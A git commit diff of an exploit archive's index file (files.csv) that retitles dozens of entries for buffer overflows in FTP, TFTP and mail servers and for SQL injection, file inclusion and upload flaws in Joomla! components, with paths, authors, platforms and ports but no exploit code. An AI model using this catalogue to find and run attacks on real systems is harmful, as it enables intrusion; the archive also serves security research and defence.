DB: 2016-11-05
7 new exploits Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3) Exim 4.41 - dns_build_reverse Local Exploit Exim 4.41 - 'dns_build_reverse' Local Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC) BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC) ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1) Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Winamp 5.551 - MAKI Parsing Integer Overflow Exploit Winamp 5.551 - MAKI Parsing Integer Overflow Icarus 2.0 - '.icp' Local Stack Overflow (PoC) Icarus 2.0 - '.ICP' Local Stack Overflow (PoC) ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2) Rock Band CMS 0.10 - news.php Multiple SQL Injection Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1) Winamp 5.572 - whatsnew.txt Stack Overflow Exploit Winamp 5.572 - whatsnew.txt Stack Overflow Joomla! Component com_wmtpic 1.0 - SQL Injection Joomla! Component 'com_wmtpic' 1.0 - SQL Injection TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1) Joomla! Component MediQnA 1.1 - Local File Inclusion Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion Joomla! Component My Car - Multiple Vulnerabilities Joomla! Component BF Quiz - SQL Injection (1) Joomla! Component com_jepoll - (pollid) SQL Injection Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection Joomla! Component 'com_mycar' - Multiple Vulnerabilities Joomla! Component 'com_bfquiztrial' - SQL Injection (1) Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection Joomla! Component BF Quiz - SQL Injection (2) Joomla! Component 'com_bfquiztrial' - SQL Injection (2) Joomla! Component com_quran - SQL Injection Joomla! Component 'com_quran' - SQL Injection Joomla! Component com_g2bridge - Local File Inclusion Joomla! Component 'com_g2bridge' - Local File Inclusion Joomla! Component com_jsjobs - SQL Injection Joomla! Component 'com_jsjobs' - SQL Injection Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection Joomla! Component 'com_chronocontact' - Blind SQL Injection Joomla! Component com_lead - SQL Injection Joomla! Component 'com_lead' - SQL Injection Joomla! Component com_djartgallery - Multiple Vulnerabilities Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities Joomla! Component com_searchlog - SQL Injection Joomla! Component 'com_searchlog' - SQL Injection Joomla! Component com_annonces - Arbitrary File Upload Joomla! Component 'com_annonces' - Arbitrary File Upload Joomla! Component cinema - SQL Injection Joomla! Component 'com_cinema' - SQL Injection Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting Joomla! Component com_jstore - SQL Injection Joomla! Component com_jtickets - SQL Injection Joomla! Component com_jcommunity - SQL Injection Joomla! Component com_jmarket - SQL Injection Joomla! Component com_jsubscription - SQL Injection Joomla! Component 'com_jstore' - SQL Injection Joomla! Component 'com_jtickets' - SQL Injection Joomla! Component 'com_jcommunity' - SQL Injection Joomla! Component 'com_jmarket' - SQL Injection Joomla! Component 'com_jsubscription' - SQL Injection Joomla! Component com_jnewsletter - SQL Injection Joomla! Component 'com_jnewsletter' - SQL Injection Joomla! Component com_joomdocs - Cross-Site Scripting Joomla! Component Answers 2.3beta - Multiple Vulnerabilities Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities Joomla! Component listbingo 1.3 - Multiple Vulnerabilities Joomla! Component 'com_joomdocs' - Cross-Site Scripting Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting Joomla! Component com_eportfolio - Arbitrary File Upload Joomla! Component 'com_eportfolio' - Arbitrary File Upload Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting Joomla! Component Hot Property com_jomestate - Remote File Inclusion Joomla! Component 'com_community' - Persistent Cross-Site Scripting Joomla! Component 'com_jomestate' - Remote File Inclusion Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection Joomla! Component Picasa2Gallery - Local File Inclusion Joomla! Component 'com_picasa2gallery' - Local File Inclusion Joomla! Component JE Ajax Event Calendar - SQL Injection Joomla! Component 'jeeventcalendar' - SQL Injection Joomla! Component com_realtyna - Local File Inclusion Joomla! Component 'com_realtyna' - Local File Inclusion Joomla! Component JE Story Submit - SQL Injection Joomla! Component com_sef - Remote File Inclusion Joomla! Component 'jesubmit' - SQL Injection Joomla! Component 'com_sef' - Remote File Inclusion Joomla! Component JE Awd Song - Persistent Cross-Site Scripting Joomla! Component JE Media Player - Local File Inclusion Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting Joomla! Component 'JE Media Player' - Local File Inclusion Joomla! Component JE Event Calendar - Local File Inclusion Joomla! Component JE Job com_jejob - Local File Inclusion Joomla! Component JE Section Finder - Local File Inclusion Joomla! Component 'jeeventcalendar' - Local File Inclusion Joomla! Component 'com_jejob' - Local File Inclusion Joomla! Component 'jesectionfinder' - Local File Inclusion Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection Joomla! Component Joomanager - SQL Injection Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection Joomla! Component 'Joomanager' - SQL Injection Joomla! Component com_dateconverter 0.1 - SQL Injection Joomla! Component 'com_dateconverter' 0.1 - SQL Injection Joomla! Component Front-End Article Manager System - Arbitrary File Upload Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection Joomla! Component 'com_seyret' - Blind SQL Injection Joomla! Component Seyret (com_seyret) - Local File Inclusion Joomla! Component 'com_seyret' - Local File Inclusion Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection Joomla! Component 'com_phocagallery' - SQL Injection Joomla! Component 'com_addressbook' - Blind SQL Injection Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection Joomla! Component SEF (com_sef) - Local File Inclusion Joomla! Component 'com_ninjamonials' - Blind SQL Injection Joomla! Component 'com_sef' - Local File Inclusion Joomla! Component JPodium (com_jpodium) - SQL Injection Joomla! Component 'com_jpodium' - SQL Injection Joomla! Component com_autartimonial - SQL Injection Joomla! Component 'com_autartimonial' - SQL Injection TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2) Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit) Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit) Microsoft Excel 2010 - Crash PoC (1) Microsoft Excel 2010 - Crash (PoC) (1) Brooky CubeCart 2.0.1 - SQL Injection Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities Joomla! Component com_sar_news - 'id' Parameter SQL Injection Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection Joomla! Component Jreservation - Cross-Site Scripting Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion Joomla! Component 'com_canteen' 1.0 - Local File Inclusion Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2) IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation VLC Media Player 2.2.1 - Buffer Overflow VideoLAN VLC Media Player 2.2.1 - Buffer Overflow Just Dial Clone Script - SQL Injection Just Dial Clone Script - SQL Injection (1) Just Dial Clone Script - SQL Injection Just Dial Clone Script - SQL Injection (2) IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow
This commit is contained in:
parent
1edbc5ecc4
commit
c65daa1397
13 changed files with 576 additions and 149 deletions
178
files.csv
178
files.csv
|
@ -511,7 +511,7 @@ id,file,description,date,author,platform,type,port
|
|||
659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0
|
||||
660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
|
||||
662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,windows,dos,0
|
||||
663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow",2004-11-29,muts,windows,remote,143
|
||||
663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143
|
||||
664,platforms/windows/dos/664.c,"Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow",2004-11-29,NoPh0BiA,windows,dos,0
|
||||
665,platforms/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow",2004-11-29,"Luigi Auriemma",windows,dos,0
|
||||
667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0
|
||||
|
@ -820,7 +820,7 @@ id,file,description,date,author,platform,type,port
|
|||
1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - register.php SQL Injection",2005-05-20,deluxe89,php,webapps,0
|
||||
1007,platforms/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,multiple,remote,0
|
||||
1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0
|
||||
1009,platforms/linux/local/1009.c,"Exim 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0
|
||||
1009,platforms/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Exploit",2005-05-25,Plugger,linux,local,0
|
||||
1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - Password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0
|
||||
1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - Password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0
|
||||
1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - Password.asp Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0
|
||||
|
@ -2546,7 +2546,7 @@ id,file,description,date,author,platform,type,port
|
|||
2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0
|
||||
2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0
|
||||
2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0
|
||||
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit",2006-11-30,cthulhu,windows,remote,69
|
||||
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69
|
||||
2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0
|
||||
2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
|
||||
2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
|
||||
|
@ -2805,10 +2805,10 @@ id,file,description,date,author,platform,type,port
|
|||
3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0
|
||||
3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0
|
||||
3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
|
||||
3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0
|
||||
3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0
|
||||
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,69
|
||||
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69
|
||||
3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143
|
||||
3134,platforms/php/webapps/3134.php,"KGB 1.9 - (sesskglogadmin.php) Local File Inclusion",2007-01-15,Kacper,php,webapps,0
|
||||
3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0
|
||||
|
@ -7837,7 +7837,7 @@ id,file,description,date,author,platform,type,port
|
|||
8318,platforms/php/webapps/8318.txt,"JobHut 1.2 - (pk) SQL Injection",2009-03-30,K-159,php,webapps,0
|
||||
8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0
|
||||
8320,platforms/multiple/dos/8320.py,"Opera 9.64 - (7400 nested elements) XML Parsing Remote Crash",2009-03-30,"Ahmed Obied",multiple,dos,0
|
||||
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0
|
||||
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0
|
||||
8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,windows,local,0
|
||||
8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",php,webapps,0
|
||||
8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,php,webapps,0
|
||||
|
@ -8287,7 +8287,7 @@ id,file,description,date,author,platform,type,port
|
|||
8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow",2009-05-26,Nine:Situations:Group,windows,local,0
|
||||
8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0
|
||||
8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0
|
||||
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0
|
||||
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0
|
||||
8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0
|
||||
8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0
|
||||
8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,multiple,remote,0
|
||||
|
@ -8628,7 +8628,7 @@ id,file,description,date,author,platform,type,port
|
|||
9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
|
||||
9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,remote,0
|
||||
9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0
|
||||
9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.icp' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0
|
||||
9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0
|
||||
9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,windows,local,0
|
||||
9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0
|
||||
9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0
|
||||
|
@ -8938,7 +8938,7 @@ id,file,description,date,author,platform,type,port
|
|||
9465,platforms/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,php,webapps,0
|
||||
9466,platforms/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,windows,local,0
|
||||
9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0
|
||||
9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow",2009-08-18,Wraith,windows,remote,69
|
||||
9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69
|
||||
9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps,0
|
||||
9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps,0
|
||||
9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0
|
||||
|
@ -9023,7 +9023,7 @@ id,file,description,date,author,platform,type,port
|
|||
9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflows (SEH)",2009-08-31,hack4love,windows,local,0
|
||||
9551,platforms/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer Exploit (SEH)",2009-08-31,mr_me,windows,local,0
|
||||
9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - (listings.php op) SQL Injection",2009-08-31,Mr.SQL,php,webapps,0
|
||||
9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - news.php Multiple SQL Injection",2009-08-31,Affix,php,webapps,0
|
||||
9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1)",2009-08-31,Affix,php,webapps,0
|
||||
9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
|
||||
9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0
|
||||
9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0
|
||||
|
@ -10327,7 +10327,7 @@ id,file,description,date,author,platform,type,port
|
|||
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
|
||||
11249,platforms/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0
|
||||
11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
|
||||
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0
|
||||
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
|
||||
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
|
||||
11257,platforms/windows/remote/11257.rb,"AOL 9.5 - Phobos.Playlist 'Import()' Buffer Overflow (Metasploit)",2010-01-25,Trancer,windows,remote,0
|
||||
11258,platforms/php/webapps/11258.html,"Status2k - Remote Add Admin",2010-01-25,alnjm33,php,webapps,0
|
||||
|
@ -10831,7 +10831,7 @@ id,file,description,date,author,platform,type,port
|
|||
11834,platforms/windows/local/11834.py,"Kenward Zipper 1.4 - Stack Buffer Overflow (PoC)",2010-03-22,mr_me,windows,local,0
|
||||
11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - (Authentication Bypass) SQL Injection",2010-03-22,"cr4wl3r ",php,webapps,0
|
||||
11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0
|
||||
14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
|
||||
14128,platforms/php/webapps/14128.txt,"Joomla! Component 'com_wmtpic' 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
|
||||
11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0
|
||||
11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
|
||||
11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
|
||||
|
@ -11508,7 +11508,7 @@ id,file,description,date,author,platform,type,port
|
|||
12601,platforms/php/webapps/12601.txt,"Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
|
||||
12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0
|
||||
12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0
|
||||
12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0
|
||||
12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0
|
||||
12607,platforms/php/webapps/12607.txt,"Joomla! Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0
|
||||
|
@ -11655,7 +11655,7 @@ id,file,description,date,author,platform,type,port
|
|||
12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0
|
||||
14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow",2010-07-10,blake,windows,remote,0
|
||||
12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0
|
||||
12769,platforms/php/webapps/12769.txt,"Joomla! Component MediQnA 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0
|
||||
12769,platforms/php/webapps/12769.txt,"Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0
|
||||
12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0
|
||||
12771,platforms/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,php,webapps,0
|
||||
12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps,0
|
||||
|
@ -11664,10 +11664,10 @@ id,file,description,date,author,platform,type,port
|
|||
12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0
|
||||
12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0
|
||||
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
|
||||
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
|
||||
12781,platforms/php/webapps/12781.txt,"Joomla! Component com_jepoll - (pollid) SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12782,platforms/php/webapps/12782.txt,"Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection",2010-05-28,v3n0m,php,webapps,0
|
||||
12779,platforms/php/webapps/12779.txt,"Joomla! Component 'com_mycar' - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
|
||||
12780,platforms/php/webapps/12780.txt,"Joomla! Component 'com_bfquiztrial' - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
|
||||
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
